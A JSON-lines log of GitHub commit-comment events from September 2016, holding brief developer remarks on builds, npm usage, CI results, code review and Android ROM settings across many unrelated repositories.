{"id":"4577573294","type":"CommitCommentEvent","actor":{"login":"fr500"},"repo":{"name":"libretro/Genesis-Plus-GX"},"payload":{"comment":{"id":19063930,"position":null,"line":null,"path":null,"commit_id":"64ee605076b4f63e3a3a65316323cc61f210f030","created_at":"2016-09-17T08:08:42Z","updated_at":"2016-09-17T08:08:42Z","body":"we have similar corruption on nxengine, so the steps would be the same right?\r\nCC=clang CFLAGS=-fsanitize=alignment LD=clang LDFLAGS=\"-fsanitize=alignment -lubsan\" make -f Makefile.libretro -j2 DEBUG=1\r\n \r\nCC=clang CFLAGS=-fsanitize=alignment LD=clang LDFLAGS=\"-fsanitize=alignment -lubsan\" ./configure\r\nmake -j2 DEBUG=1\r\n\r\nThen run the core and watch stdout?"}},"created_at":"2016-09-17T08:08:42Z"}
{"id":"4577573381","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":19063931,"position":null,"line":null,"path":null,"commit_id":"cb11236e685ee38518955ce895390f1e550f0b74","created_at":"2016-09-17T08:08:47Z","updated_at":"2016-09-17T08:08:47Z","body":"Great. Packages are in unstable already. Have you also checked the dark color scheme?"}},"created_at":"2016-09-17T08:08:47Z"}
{"id":"4577573461","type":"CommitCommentEvent","actor":{"login":"kdinev"},"repo":{"name":"IgniteUI/ignite-ui"},"payload":{"comment":{"id":19063932,"position":null,"line":null,"path":null,"commit_id":"f6c5e2c4fc67da98f00fd708aaf69e55c46b2727","created_at":"2016-09-17T08:08:50Z","updated_at":"2016-09-17T08:08:50Z","body":"#353 "}},"created_at":"2016-09-17T08:08:50Z"}
{"id":"4577573768","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"image-js/core"},"payload":{"comment":{"id":19063933,"position":4,"line":79,"path":"package.json","commit_id":"4ffeb2f992e19cef9cd491949175341e56970f2a","created_at":"2016-09-17T08:09:10Z","updated_at":"2016-09-17T08:09:10Z","body":"`--save-dev`"}},"created_at":"2016-09-17T08:09:10Z"}
{"id":"4577574467","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"image-js/core"},"payload":{"comment":{"id":19063936,"position":4,"line":79,"path":"package.json","commit_id":"4ffeb2f992e19cef9cd491949175341e56970f2a","created_at":"2016-09-17T08:09:49Z","updated_at":"2016-09-17T08:09:49Z","body":"or `npm i -D better-console`"}},"created_at":"2016-09-17T08:09:49Z"}
{"id":"4577574526","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19063937,"position":null,"line":null,"path":null,"commit_id":"de524c1a26582da325103e82fb8bddeeabf33b25","created_at":"2016-09-17T08:09:51Z","updated_at":"2016-09-17T08:09:51Z","body":"wait, wtf, where's the rest of this code? did it get lost? ugh"}},"created_at":"2016-09-17T08:09:51Z"}
{"id":"4577575497","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"image-js/core"},"payload":{"comment":{"id":19063938,"position":4,"line":79,"path":"package.json","commit_id":"4ffeb2f992e19cef9cd491949175341e56970f2a","created_at":"2016-09-17T08:10:33Z","updated_at":"2016-09-17T08:10:33Z","body":"Cool resource: http://ashleygwilliams.github.io/you-dont-know-npm/"}},"created_at":"2016-09-17T08:10:33Z"}
{"id":"4577575528","type":"CommitCommentEvent","actor":{"login":"bingo20145"},"repo":{"name":"hldai/entity-linking-with-cnn"},"payload":{"comment":{"id":19063939,"position":null,"line":null,"path":null,"commit_id":"08a56e324204a575e33ee1e8ae0f5d6d60e75f4b","created_at":"2016-09-17T08:10:35Z","updated_at":"2016-09-17T08:10:35Z","body":"Are you the author of Modeling Mention,Context and Entity with Neural Networks for Entity Disambiguation?"}},"created_at":"2016-09-17T08:10:35Z"}
{"id":"4577575587","type":"CommitCommentEvent","actor":{"login":"danny1990"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19063940,"position":null,"line":null,"path":null,"commit_id":"47e0b7eec842646006b3edd4195ee202b1b68777","created_at":"2016-09-17T08:10:38Z","updated_at":"2016-09-17T08:10:38Z","body":"Thanks"}},"created_at":"2016-09-17T08:10:38Z"}
{"id":"4577575896","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19063941,"position":null,"line":null,"path":null,"commit_id":"de524c1a26582da325103e82fb8bddeeabf33b25","created_at":"2016-09-17T08:10:55Z","updated_at":"2016-09-17T08:10:55Z","body":"aoifjweflakjwoeij that was a LOT of code, damn it, Git"}},"created_at":"2016-09-17T08:10:55Z"}
{"id":"4577576158","type":"CommitCommentEvent","actor":{"login":"zhankuiwang"},"repo":{"name":"0917/CRM"},"payload":{"comment":{"id":19063942,"position":null,"line":null,"path":null,"commit_id":"81f4e06f30cd46c8cfb9752582608ec7a22eded9","created_at":"2016-09-17T08:11:07Z","updated_at":"2016-09-17T08:11:07Z","body":"888"}},"created_at":"2016-09-17T08:11:07Z"}
{"id":"4577576615","type":"CommitCommentEvent","actor":{"login":"hkozachkov"},"repo":{"name":"opencv/opencv"},"payload":{"comment":{"id":19063943,"position":null,"line":null,"path":null,"commit_id":"c5d7791b67cb2810bff9a3123f9f640e5dcc7530","created_at":"2016-09-17T08:11:32Z","updated_at":"2016-09-17T08:11:32Z","body":"Hi, thanks for getting to this so quickly. Unfortunately, I've had to flash all the TX1s I have access to back to 32 bit due to other unrelated issues that cropped up and a looming deadline, so I can't test the fix until next week at the earliest. My apologies.\r\n\r\nOn Fri, Sep 16, 2016 at 1:49 AM Tomoaki Teshima <notifications@github.com<mailto:notifications@github.com>> wrote:\r\n\r\n@hkozachkov<https://github.com/hkozachkov> , could you have a look if #7294<https://github.com/opencv/opencv/pull/7294> fix your problem, please ?\r\n\r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub<https://github.com/opencv/opencv/commit/c5d7791b67cb2810bff9a3123f9f640e5dcc7530#commitcomment-19050631>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AAle-Zzo6hqoHG2kBZz4XKIq-B7oRLrAks5qqlgugaJpZM4J-dQ4>.\r\n"}},"created_at":"2016-09-17T08:11:32Z"}
{"id":"4577579615","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19063944,"position":null,"line":null,"path":null,"commit_id":"de524c1a26582da325103e82fb8bddeeabf33b25","created_at":"2016-09-17T08:14:11Z","updated_at":"2016-09-17T08:14:11Z","body":"Never mind, it was in my Git stash! All good!"}},"created_at":"2016-09-17T08:14:11Z"}
{"id":"4577579730","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":19063946,"position":9,"line":524,"path":"xwiki-platform-core/pom.xml","commit_id":"5fe38fa82f18304bc27acaa10f57f6bedab48ab7","created_at":"2016-09-17T08:14:16Z","updated_at":"2016-09-17T08:14:16Z","body":"I'd add \"by mistake\" at the end ;)"}},"created_at":"2016-09-17T08:14:16Z"}
{"id":"4577579958","type":"CommitCommentEvent","actor":{"login":"juhyun10"},"repo":{"name":"juhyun10/DesignPattern"},"payload":{"comment":{"id":19063948,"position":60,"line":60,"path":"DesignPattern/src/chap02/objectOrientedPrinciple/P66_ArrayListStack.java","commit_id":"7e3290cc9c5494d812ed0ea4a3506e9785fc65a1","created_at":"2016-09-17T08:14:27Z","updated_at":"2016-09-17T08:14:27Z","body":"ArrayList의 remove()는 해당 인덱스 값 리턴 후 삭제"}},"created_at":"2016-09-17T08:14:27Z"}
{"id":"4577579961","type":"CommitCommentEvent","actor":{"login":"tangshengbo"},"repo":{"name":"tangshengbo/mygit"},"payload":{"comment":{"id":19063949,"position":null,"line":null,"path":null,"commit_id":"5920c76c6b0787d7d8c1b3453e57ba1dd055e993","created_at":"2016-09-17T08:14:27Z","updated_at":"2016-09-17T08:14:27Z","body":"发生地方"}},"created_at":"2016-09-17T08:14:27Z"}
{"id":"4577580197","type":"CommitCommentEvent","actor":{"login":"ygandy"},"repo":{"name":"ygandy/labs"},"payload":{"comment":{"id":19063950,"position":null,"line":null,"path":null,"commit_id":"dec9e61c26b774fcef9af0f2fc90197596fd23ca","created_at":"2016-09-17T08:14:38Z","updated_at":"2016-09-17T08:14:38Z","body":"Accidentally submitted wrong version. Will resubmit!\r\n"}},"created_at":"2016-09-17T08:14:38Z"}
{"id":"4577580714","type":"CommitCommentEvent","actor":{"login":"nehpetsde"},"repo":{"name":"nfcpy/nfcpy"},"payload":{"comment":{"id":19063951,"position":null,"line":null,"path":null,"commit_id":"0f59b61c0218571a3421cc5795aeadd28115c17f","created_at":"2016-09-17T08:15:06Z","updated_at":"2016-09-17T08:15:06Z","body":"It's tty:S0:pn532 for the serial node /dev/ttyS0. But I had to first set \"enable_uart=1\" in /boot/config.txt and reboot before the device node appeared."}},"created_at":"2016-09-17T08:15:06Z"}
{"id":"4577582224","type":"CommitCommentEvent","actor":{"login":"midwan"},"repo":{"name":"midwan/uae4arm-rpi"},"payload":{"comment":{"id":19063953,"position":null,"line":null,"path":null,"commit_id":"8cf28bfadff28cbebf725915f4c02ea5d87b45ec","created_at":"2016-09-17T08:16:27Z","updated_at":"2016-09-17T08:16:27Z","body":"Fixes #9 (high CPU usage still remains for now)"}},"created_at":"2016-09-17T08:16:27Z"}
{"id":"4577583813","type":"CommitCommentEvent","actor":{"login":"lpatiny"},"repo":{"name":"image-js/core"},"payload":{"comment":{"id":19063956,"position":null,"line":null,"path":null,"commit_id":"57f9ee037075b23603799f8bf3fd10f11ce40039","created_at":"2016-09-17T08:17:55Z","updated_at":"2016-09-17T08:17:55Z","body":"Actually the code before was wrong because I forgot to put the\r\n`points.length=position;`\r\nBut I still wonder what is the faster way ...  We have jsperf on lactame ?\r\n\r\n\r\n"}},"created_at":"2016-09-17T08:17:55Z"}
{"id":"4577583991","type":"CommitCommentEvent","actor":{"login":"Kirek"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":19063958,"position":null,"line":null,"path":null,"commit_id":"cb11236e685ee38518955ce895390f1e550f0b74","created_at":"2016-09-17T08:18:06Z","updated_at":"2016-09-17T08:18:06Z","body":"Yes, it's good, is like breeze dark but with maia greens instead of blue."}},"created_at":"2016-09-17T08:18:06Z"}
{"id":"4577587608","type":"CommitCommentEvent","actor":{"login":"snak3ater"},"repo":{"name":"SAOSP-N/platform_packages_apps_Settings"},"payload":{"comment":{"id":19063961,"position":null,"line":null,"path":null,"commit_id":"60327f387b77aa1661da7ff140bfb9647def6545","created_at":"2016-09-17T08:21:29Z","updated_at":"2016-09-17T08:21:29Z","body":"Hi.. Thanks for the tip.. Didn't notice this thing. Removing this patch"}},"created_at":"2016-09-17T08:21:29Z"}
{"id":"4577588374","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063962,"position":null,"line":null,"path":null,"commit_id":"f92ff090099e2a23abe28140f67b8c424c53569e","created_at":"2016-09-17T08:22:13Z","updated_at":"2016-09-17T08:22:13Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-17T08:22:13Z"}
{"id":"4577589331","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"image-js/core"},"payload":{"comment":{"id":19063964,"position":null,"line":null,"path":null,"commit_id":"57f9ee037075b23603799f8bf3fd10f11ce40039","created_at":"2016-09-17T08:23:01Z","updated_at":"2016-09-17T08:23:01Z","body":"A regression test is a test that you add when you make a fix. It is to avoid the same bug to come back in the future"}},"created_at":"2016-09-17T08:23:01Z"}
{"id":"4577590058","type":"CommitCommentEvent","actor":{"login":"TeamSpen210"},"repo":{"name":"TeamSpen210/BEE2-items"},"payload":{"comment":{"id":19063965,"position":null,"line":null,"path":null,"commit_id":"66e0476e4158d681bfbbc572a133146ae189d9f2","created_at":"2016-09-17T08:23:35Z","updated_at":"2016-09-17T08:23:35Z","body":"It actually takes a lot of work to make it like that."}},"created_at":"2016-09-17T08:23:35Z"}
{"id":"4577590075","type":"CommitCommentEvent","actor":{"login":"khiyoko"},"repo":{"name":"khiyoko/dotfiles"},"payload":{"comment":{"id":19063966,"position":null,"line":null,"path":null,"commit_id":"d1d88dfaaf8369196c5b7b10534bd112db720a01","created_at":"2016-09-17T08:23:36Z","updated_at":"2016-09-17T08:23:36Z","body":"readme"}},"created_at":"2016-09-17T08:23:36Z"}
{"id":"4577590265","type":"CommitCommentEvent","actor":{"login":"ch0rus"},"repo":{"name":"CyanogenMod/android_device_xiaomi_gemini"},"payload":{"comment":{"id":19063967,"position":null,"line":null,"path":null,"commit_id":"c9d477fece3853195a04afeb7eeb4c4d5aeca168","created_at":"2016-09-17T08:23:43Z","updated_at":"2016-09-17T08:23:43Z","body":"I know why you didn't, but I don't agree that it's a good idea.\n\nI don't think it's reasonable to think that the people changing to CyanogenMod also want to change the way their buttons is configured. The sane thing to do would be to keep the buttons standard as default, and offer the users an option to change it.\n\nI'm also pretty sure that I read somewhere that CyanogenMods policy is to not change things like this? (And of course I can not find it now...)"}},"created_at":"2016-09-17T08:23:43Z"}
{"id":"4577590323","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"image-js/core"},"payload":{"comment":{"id":19063968,"position":null,"line":null,"path":null,"commit_id":"57f9ee037075b23603799f8bf3fd10f11ce40039","created_at":"2016-09-17T08:23:45Z","updated_at":"2016-09-17T08:23:45Z","body":"No we don't have jsperf"}},"created_at":"2016-09-17T08:23:45Z"}
{"id":"4577591097","type":"CommitCommentEvent","actor":{"login":"kirkee2"},"repo":{"name":"ENOW-IJI/storm"},"payload":{"comment":{"id":19063969,"position":null,"line":null,"path":null,"commit_id":"5743c3d4ad05720b44f8ff53a1f51a09bfb308d7","created_at":"2016-09-17T08:24:20Z","updated_at":"2016-09-17T08:24:20Z","body":"#11 "}},"created_at":"2016-09-17T08:24:20Z"}
{"id":"4577591812","type":"CommitCommentEvent","actor":{"login":"ch0rus"},"repo":{"name":"CyanogenMod/android_device_xiaomi_gemini"},"payload":{"comment":{"id":19063970,"position":null,"line":null,"path":null,"commit_id":"c9d477fece3853195a04afeb7eeb4c4d5aeca168","created_at":"2016-09-17T08:24:57Z","updated_at":"2016-09-17T08:24:57Z","body":"\"I know why you did it\", sorry"}},"created_at":"2016-09-17T08:24:57Z"}
{"id":"4577592289","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"godotengine/asset-library"},"payload":{"comment":{"id":19063972,"position":5,"line":514,"path":"src/routes/asset_edit.php","commit_id":"a2cfa501fea9cd1f7dc28ae180e9b7a51006ab9e","created_at":"2016-09-17T08:25:20Z","updated_at":"2016-09-17T08:25:20Z","body":"Ah, nice miss... Since it would be handled on 509, but without checking for trim..."}},"created_at":"2016-09-17T08:25:20Z"}
{"id":"4577592797","type":"CommitCommentEvent","actor":{"login":"NathanW2"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19063973,"position":null,"line":null,"path":null,"commit_id":"59583e97deef732f6884a54b518fc34225fd6012","created_at":"2016-09-17T08:25:49Z","updated_at":"2016-09-17T08:25:49Z","body":"Was this what you talked to me about the other day?"}},"created_at":"2016-09-17T08:25:49Z"}
{"id":"4577594633","type":"CommitCommentEvent","actor":{"login":"jimbocoder"},"repo":{"name":"insurancezebra/zebra-static-boilerplate"},"payload":{"comment":{"id":19063976,"position":112,"line":105,"path":"gulpfile.js","commit_id":"abae1af826592f785b7861e348a92482bab01695","created_at":"2016-09-17T08:27:20Z","updated_at":"2016-09-17T08:27:20Z","body":"@mattjared I believe `**/.DS_Store` will take care of all those suckers with extreme prejudice.\r\n\r\nAlso worth considering is `**/.*` - as in, do we EVER have a situation where we want to serve dotfiles on a static site?  Not that I can think right now."}},"created_at":"2016-09-17T08:27:20Z"}
{"id":"4577595730","type":"CommitCommentEvent","actor":{"login":"vitalyp"},"repo":{"name":"McLoy/EasyTasks"},"payload":{"comment":{"id":19063977,"position":null,"line":null,"path":null,"commit_id":"4e07d454ef63df20fc55c28f6268ff9816a0e6a4","created_at":"2016-09-17T08:28:16Z","updated_at":"2016-09-17T08:28:16Z","body":"Use unit test, follow TDD.\nThis task is a typical Test Driven Development case."}},"created_at":"2016-09-17T08:28:16Z"}
{"id":"4577596109","type":"CommitCommentEvent","actor":{"login":"AhmadQatar"},"repo":{"name":"oivva/st-boxy"},"payload":{"comment":{"id":19063978,"position":null,"line":null,"path":null,"commit_id":"cb70304a6186c1d8a277c9aa5e946515001c63b3","created_at":"2016-09-17T08:28:34Z","updated_at":"2016-09-17T08:28:34Z","body":"nice , Thaaaanks 👍 "}},"created_at":"2016-09-17T08:28:34Z"}
{"id":"4577597932","type":"CommitCommentEvent","actor":{"login":"ttpro1995"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":19063980,"position":null,"line":null,"path":null,"commit_id":"2089403b9065ca821c3fbd7cb6297b9c792d4637","created_at":"2016-09-17T08:30:09Z","updated_at":"2016-09-17T08:30:09Z","body":"Can anybody explain that this datasharing do ?"}},"created_at":"2016-09-17T08:30:09Z"}
{"id":"4577598541","type":"CommitCommentEvent","actor":{"login":"YoungjaeKim"},"repo":{"name":"YoungjaeKim/PTVS"},"payload":{"comment":{"id":19063982,"position":null,"line":null,"path":null,"commit_id":"c90f78be7967827502bd3b8c5434c9d43f83c9e3","created_at":"2016-09-17T08:30:36Z","updated_at":"2016-09-17T08:30:36Z","body":"Applied `Out-Null` and confirmed that the `ERROR ( message:Cannot find requested collection element. )` message was not logged."}},"created_at":"2016-09-17T08:30:36Z"}
{"id":"4577599869","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"MrMC/mrmc"},"payload":{"comment":{"id":19063983,"position":20,"line":296,"path":"xbmc/pictures/GUIWindowSlideShow.cpp","commit_id":"221871b4ed891facec3cc8d7c7a085b52c64069e","created_at":"2016-09-17T08:31:36Z","updated_at":"2016-09-17T08:31:36Z","body":"c/p monster. Should be false to enable droid ss ;)"}},"created_at":"2016-09-17T08:31:36Z"}
{"id":"4577600779","type":"CommitCommentEvent","actor":{"login":"kerphi"},"repo":{"name":"Inist-CNRS/ezmaster"},"payload":{"comment":{"id":19063986,"position":null,"line":null,"path":null,"commit_id":"342ff83c2cd330b8638f59e9e482c974e2fd4c05","created_at":"2016-09-17T08:32:26Z","updated_at":"2016-09-17T08:32:26Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;GvBD9Fa0&#x2F;321-faire-transiter-la-variable-no-proxy\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Faire transiter la variable no_proxy</a>"}},"created_at":"2016-09-17T08:32:26Z"}
{"id":"4577605467","type":"CommitCommentEvent","actor":{"login":"yuya-oc"},"repo":{"name":"Razzeee/desktop"},"payload":{"comment":{"id":19063996,"position":12,"line":39,"path":"src/main.js","commit_id":"66757ca406e9b3796f7d4c0c95fb43fdaec4dea9","created_at":"2016-09-17T08:36:46Z","updated_at":"2016-09-17T08:36:46Z","body":"Both of `enable` and `disable` return Promise, so this might not work as you expect. I think it's that just calling `enable` is enough for here."}},"created_at":"2016-09-17T08:36:46Z"}
{"id":"4577606668","type":"CommitCommentEvent","actor":{"login":"nomanullahgroupdocs"},"repo":{"name":"nomanullahgroupdocs/GroupDocs.Search-for-.NET"},"payload":{"comment":{"id":19063998,"position":null,"line":null,"path":null,"commit_id":"4e8759f1a3d0a886f16fd87d8d528b15a67587fb","created_at":"2016-09-17T08:37:56Z","updated_at":"2016-09-17T08:37:56Z","body":"these are Search API .NET ver 1.2 examples changes and not version 1.7"}},"created_at":"2016-09-17T08:37:56Z"}
{"id":"4577607548","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19063999,"position":null,"line":null,"path":null,"commit_id":"0467f0855753344b7d798f747c7b48d3da38eecc","created_at":"2016-09-17T08:38:43Z","updated_at":"2016-09-17T08:38:43Z","body":"@MichaelWallace30 \r\nCallback codes allow the user to specify return statements back to the Comms node, which will then be used to determine what the user wants to do with the packet, or determine commands."}},"created_at":"2016-09-17T08:38:43Z"}
{"id":"4577607871","type":"CommitCommentEvent","actor":{"login":"yuya-oc"},"repo":{"name":"Razzeee/desktop"},"payload":{"comment":{"id":19064001,"position":4,"line":31,"path":"src/main.js","commit_id":"66757ca406e9b3796f7d4c0c95fb43fdaec4dea9","created_at":"2016-09-17T08:38:58Z","updated_at":"2016-09-17T08:38:58Z","body":"Probably you have to also handle `--squirrel-install` because the user executes the .exe as an installer."}},"created_at":"2016-09-17T08:38:58Z"}
{"id":"4577608725","type":"CommitCommentEvent","actor":{"login":"blizzz"},"repo":{"name":"owncloud/bookmarks"},"payload":{"comment":{"id":19064003,"position":21,"line":46,"path":"appinfo/application.php","commit_id":"8f5baa3f32ee5a73b7524c55c76f5710d5989933","created_at":"2016-09-17T08:39:41Z","updated_at":"2016-09-17T08:39:41Z","body":"woah, good catch, thank you!"}},"created_at":"2016-09-17T08:39:41Z"}
{"id":"4577609701","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19064006,"position":null,"line":null,"path":null,"commit_id":"ee235a9ccb78a92de33c9bba7799b7b698e1c693","created_at":"2016-09-17T08:40:34Z","updated_at":"2016-09-17T08:40:34Z","body":"Oops sorry, I didn't notice the wrong commit subject.."}},"created_at":"2016-09-17T08:40:34Z"}
{"id":"4577609969","type":"CommitCommentEvent","actor":{"login":"luozhix"},"repo":{"name":"luozhix/hello-world"},"payload":{"comment":{"id":19064007,"position":4,"line":4,"path":"README.md","commit_id":"4a89950e623c2ba601188ccf7b70022caacc58f4","created_at":"2016-09-17T08:40:47Z","updated_at":"2016-09-17T08:40:47Z","body":"+fdsaf"}},"created_at":"2016-09-17T08:40:47Z"}
{"id":"4577610300","type":"CommitCommentEvent","actor":{"login":"TheDarkBomber"},"repo":{"name":"TeamSpen210/BEE2-items"},"payload":{"comment":{"id":19064009,"position":null,"line":null,"path":null,"commit_id":"66e0476e4158d681bfbbc572a133146ae189d9f2","created_at":"2016-09-17T08:41:03Z","updated_at":"2016-09-17T08:41:03Z","body":"It should block portal shots. And be the Physics Shield, with Physler being an alternate name."}},"created_at":"2016-09-17T08:41:03Z"}
{"id":"4577610747","type":"CommitCommentEvent","actor":{"login":"MeetTheBest"},"repo":{"name":"MeetTheBest/main"},"payload":{"comment":{"id":19064010,"position":13,"line":13,"path":"gittest.html","commit_id":"5003f7fc8f91bfc380097bf5a365dd126de5e847","created_at":"2016-09-17T08:41:29Z","updated_at":"2016-09-17T08:41:29Z","body":"<h2>你好</h2>"}},"created_at":"2016-09-17T08:41:29Z"}
{"id":"4577611403","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19064011,"position":null,"line":null,"path":null,"commit_id":"f92ff090099e2a23abe28140f67b8c424c53569e","created_at":"2016-09-17T08:42:06Z","updated_at":"2016-09-17T08:42:06Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1820 of 2394 tests passed, 0 test warnings)\n\n * 508 tests had: AUD diffs.\n * 492 tests had: EIO diffs.\n * 213 tests had: RDD diffs.\n * 470 tests had: Table big diffs.\n * 140 tests had: ERR diffs.\n * 372 tests had: MTD diffs.\n * 271 tests had: DXF diffs.\n * 397 tests had: SHD diffs.\n * 406 tests had: BND diffs.\n * 298 tests had: MDD diffs.\n * 184 tests had: SSZ big diffs.\n * 14 tests had: ESO big diffs.\n * 9 tests had: MTR big diffs.\n * 8 tests had: ZSZ small diffs.\n * 28 tests had: ESO small diffs.\n * 22 tests had: MTR small diffs.\n * 3 tests had: delightin diffs.\n * 3 tests had: delightout diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f92ff090099e2a23abe28140f67b8c424c53569e-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-76.02%25-red.svg)</a> \n"}},"created_at":"2016-09-17T08:42:06Z"}
{"id":"4577611511","type":"CommitCommentEvent","actor":{"login":"ObaniGemini"},"repo":{"name":"goatattack/goatattack"},"payload":{"comment":{"id":19064012,"position":null,"line":null,"path":null,"commit_id":"28ccdf8c98f486ff9ce7d25f36321c3e3eae3543","created_at":"2016-09-17T08:42:11Z","updated_at":"2016-09-17T08:42:11Z","body":"@IBPX : no. And no need of an explanation. This question is meaningless as it proves you didn't think to that question very much (sorry for the harsh words, but I hate this kind of comments, even more on that subject)."}},"created_at":"2016-09-17T08:42:11Z"}
{"id":"4577611563","type":"CommitCommentEvent","actor":{"login":"ilovezfs"},"repo":{"name":"Homebrew/homebrew-core"},"payload":{"comment":{"id":19064013,"position":null,"line":null,"path":null,"commit_id":"ee235a9ccb78a92de33c9bba7799b7b698e1c693","created_at":"2016-09-17T08:42:14Z","updated_at":"2016-09-17T08:42:14Z","body":"this commit shall forever live in infamy"}},"created_at":"2016-09-17T08:42:14Z"}
{"id":"4577612143","type":"CommitCommentEvent","actor":{"login":"andry-tino"},"repo":{"name":"andry-tino/inet"},"payload":{"comment":{"id":19064014,"position":19,"line":136,"path":"src/inet/linklayer/ieee80211ac/mac/MuEnabledDcfUpperMac.cc","commit_id":"ea203a8852ae569d8615944b53cccafe57434a5d","created_at":"2016-09-17T08:42:48Z","updated_at":"2016-09-17T08:42:48Z","body":"This is a terrible mistake which is causing runtime issues. In base class, `initialize` is constructing `BasicStatistics` basing on the pointer `utils`. When we delete it, the base class will basically assign a null pointer to that class! \r\n\r\nWe need to use a `MacUtils` provider method which would imply editing `Ieee80211`, or we need to override completely `initialize` in `Ieee80211ac`without calling the base class."}},"created_at":"2016-09-17T08:42:48Z"}
{"id":"4577612228","type":"CommitCommentEvent","actor":{"login":"KsyMC"},"repo":{"name":"MCPE-Addons/MCPE-Headers"},"payload":{"comment":{"id":19064015,"position":null,"line":null,"path":null,"commit_id":"bf0a87167bf3a713d354b11f482a87218cc77c7d","created_at":"2016-09-17T08:42:53Z","updated_at":"2016-09-17T08:42:53Z","body":"good job!"}},"created_at":"2016-09-17T08:42:53Z"}
{"id":"4577612376","type":"CommitCommentEvent","actor":{"login":"vko-online"},"repo":{"name":"vko-online/hs-fb"},"payload":{"comment":{"id":19064016,"position":11,"line":11,"path":"app.js","commit_id":"a72cb5216af1153f0839f501228fbf42108ff2d0","created_at":"2016-09-17T08:43:01Z","updated_at":"2016-09-17T08:43:01Z","body":"not required indeed"}},"created_at":"2016-09-17T08:43:01Z"}
{"id":"4577613576","type":"CommitCommentEvent","actor":{"login":"duck8823"},"repo":{"name":"duck8823/Slack-RTM-Bot"},"payload":{"comment":{"id":19064018,"position":27,"line":149,"path":"lib/Slack/RTM/Bot.pm","commit_id":"34fdeb922ec47f4203dd16deb98409d98037fd65","created_at":"2016-09-17T08:44:05Z","updated_at":"2016-09-17T08:44:05Z","body":"fixed #2 "}},"created_at":"2016-09-17T08:44:05Z"}
{"id":"4577614776","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19064019,"position":null,"line":null,"path":null,"commit_id":"7b6472c42ab7c23d44064d55daff66498eea642d","created_at":"2016-09-17T08:45:11Z","updated_at":"2016-09-17T08:45:11Z","body":"Initial commit."}},"created_at":"2016-09-17T08:45:11Z"}
{"id":"4577615367","type":"CommitCommentEvent","actor":{"login":"hldai"},"repo":{"name":"hldai/entity-linking-with-cnn"},"payload":{"comment":{"id":19064020,"position":null,"line":null,"path":null,"commit_id":"08a56e324204a575e33ee1e8ae0f5d6d60e75f4b","created_at":"2016-09-17T08:45:41Z","updated_at":"2016-09-17T08:45:41Z","body":"> Are you the author of Modeling Mention,Context and Entity with Neural Networks for Entity Disambiguation?\r\n\r\n@bingo20145 No, I am not. This is only a simplified version I developed myself. You should contact the author through email if you have questions about the paper."}},"created_at":"2016-09-17T08:45:41Z"}
{"id":"4577615487","type":"CommitCommentEvent","actor":{"login":"hacan"},"repo":{"name":"StevenMLocke/RL"},"payload":{"comment":{"id":19064021,"position":null,"line":null,"path":null,"commit_id":"c7fe85cb1d898b17fcf26ad54a7d677ec40dad7d","created_at":"2016-09-17T08:45:48Z","updated_at":"2016-09-17T08:45:48Z","body":"Hello, I was able to repair the plugin. I will write there may be someone will be useful to it in the future. To work correctly you need to place in the file \r\n    https://api.twitch.tv/kraken/streams?game=rocket+league&callback=?\" \r\nscript.js on line with IDs that can register the site on Twitch\r\n https://api.twitch.tv/kraken/streams?client_id=youTOKEN&game=rocket+league&callback=?\r\n\r\nGL HF regards\r\nThx for this plagin man +)"}},"created_at":"2016-09-17T08:45:48Z"}
